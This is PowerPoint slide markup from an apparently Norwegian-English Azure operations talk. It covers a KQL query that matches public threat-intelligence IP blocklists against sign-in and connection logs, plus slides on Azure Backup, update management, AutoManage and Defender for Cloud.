        <p:spPr>
          <a:xfrm>
            <a:off x="2540000" y="1025327"/>
            <a:ext cx="135382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let IP = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>externaldata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>ip:string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>[@"https://rules.emergingthreats.net/blockrules/compromised-ips.txt",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/5.txt",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>@"https://cinsscore.com/list/ci-badguys.txt",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>@"https://infosec.cert-pa.it/analyze/listip.txt",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>@"https://feodotracker.abuse.ch/downloads/ipblocklist_recommended.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>with(format="csv")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> matches regex "(^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| distinct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>isfuzzy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>=true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>SecurityEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>IpAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> in (IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| extend Ip = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>IpAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, User = Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>VMConnection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>SourceIp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> in (IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| extend Ip = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>SourceIp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>LinksLive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> == 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>SigninLogs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>IPAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> in (IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>| extend Ip = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>IPAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, User = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>UserPrincipalName</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>))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67705F-1997-4E19-83C6-1847A801BD06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484837" y="1099803"/>
            <a:ext cx="1856703" cy="563897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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External Sources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D04A6D-4232-441D-8734-A4F2075F5148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503887" y="2369803"/>
            <a:ext cx="1856703" cy="563897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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Regex Magic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BC9728-4F41-43F8-BC28-313C905B874F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="529287" y="3220703"/>
            <a:ext cx="1856703" cy="563897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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Map it against table SecurityEvent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BBB80A-BC4D-48D4-AAF0-F6789F15E208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554687" y="4230353"/>
            <a:ext cx="1856703" cy="563897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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Map it against table VMConnection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BBE1AF-B374-43A8-A74E-94029DB3ED1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580087" y="5233653"/>
            <a:ext cx="1856703" cy="563897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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Map it against table SignInLogs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84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15C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Backup</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="4000" b="1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540E3-E73A-41AD-B62B-2A9776449669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742339"/>
            <a:ext cx="4493230" cy="5750935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5475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4888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5213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2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000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2AAE823-892B-40D1-B71F-9CEB8A97E79D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530390" y="477644"/>
            <a:ext cx="4102437" cy="535585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5475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4888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5213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2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Backup for virtual machines </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Also adding support for multiple backup points yeah day (Enhanced Policy)</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="15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r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now support for Archive Tier for backup (monthly and yearly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Resource Guard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– Ensure that backup admin cannot delete backup data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are also some third party alternatives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Example: Veeam Azure for VM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Example: Velero/Kasten for AKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr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DEE46-884D-46BD-B26F-73C92C72B323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2683995" y="6232580"/>
            <a:ext cx="86095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 err="1"/>
              <a:t>Kontakt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>tilgang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>til</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
              <a:t> preview </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>askazurebackupteam@microsoft.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Multi-user authorization using Resource Guard - Azure Backup | Microsoft  Docs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B11C33D-C603-4B48-AB36-FC13C3B8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85" y="1287378"/>
            <a:ext cx="6225840" cy="343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864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B2028C6-8E03-4563-9210-A45DDA60BB7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8197850" y="1130299"/>
            <a:ext cx="3067050" cy="1289051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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015C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Update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32D8B-C9FF-4CD1-BE20-C143D2218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944" y="1259141"/>
            <a:ext cx="1000125" cy="92392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1FA410-64D2-43D1-833E-F5FF2D55B8A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9887222" y="3144772"/>
            <a:ext cx="1856703" cy="940603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200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Automation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F1FA9D0-EC3B-4E1E-B476-DCF991976078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6661422" y="3151122"/>
            <a:ext cx="1856703" cy="940603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200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log Analytics Workspace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BC4B503-CAFB-4689-8367-E0530FA07AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8915400" y="2930525"/>
            <a:ext cx="546100" cy="1308100"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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4D6ED11-A228-4228-B55B-7BE943D10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237" y="1316037"/>
            <a:ext cx="390525" cy="3905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9BF9E6-1F6C-487F-BFFE-C4012519B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6087" y="1322387"/>
            <a:ext cx="390525" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Cylinder 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B022C8C3-8BC6-414A-9726-8FD7C8AF5E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164058" y="1539350"/>
            <a:ext cx="1367808" cy="789410"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0A1B3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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Update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A02F01D-23F6-49E9-B8B1-C42B9330AC90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7073900" y="1120775"/>
            <a:ext cx="546100" cy="1638300"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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9077C9-7F9B-4204-8DB1-C43E16268F7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8185150" y="1644650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/>
              <a:t>Log Analytics Agenten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8C2060-61A3-497C-8C47-B4EC5153CA32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10280650" y="1657350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/>
              <a:t>Hybrid Runbook Worker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E2D0FD-C89E-4E39-AA5C-00AD65FB00C4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7493000" y="2290981"/>
            <a:ext cx="1196975" cy="922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9D5E7C-B56B-4159-9743-8813D6E63700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="26" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10785475" y="2303681"/>
            <a:ext cx="30099" cy="841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152CCE3-9679-413E-B578-93CD7BAF2844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742339"/>
            <a:ext cx="4102437" cy="535585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5475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4888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5213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2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does not support Optional Updates (Example: SQL Service Packs)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New version coming here soon!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does not support Windows Clients OS (Requires Intune or others)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Updates collected from the source defined on machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HotPatching - Server 2022 – Azure Edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB over QUIC (SMB over UDP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extended Networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="2000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981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15C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AutoManage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Intelligently onboard services.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479FF6E8-AA1C-451D-B4DA-650E6525B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332" y="1120928"/>
            <a:ext cx="6292616" cy="440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8C6A8ED-61D7-4118-B2DC-A76D5910D54A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483052" y="638893"/>
            <a:ext cx="4102437" cy="407445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5475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4888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5213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r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Predefined profiles for management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production or Dev/test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backup not activiated for dev/test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guest Configuration Baseline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not support in Norway East yet...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000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nb-N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839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BE34F2-DC87-47DC-B431-67693F502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661" y="1243459"/>
            <a:ext cx="6401693" cy="2838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9015C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Defender for Cloud and Servers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7FC82CD-4DED-4552-950F-50C231C11BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465004" y="289978"/>
            <a:ext cx="4102437" cy="585438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5475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4888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5213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r>
              <a:rPr lang="nb-NO" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft and third-party vulnerability management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft or Qualys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software Inventory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" b="1" dirty="0">
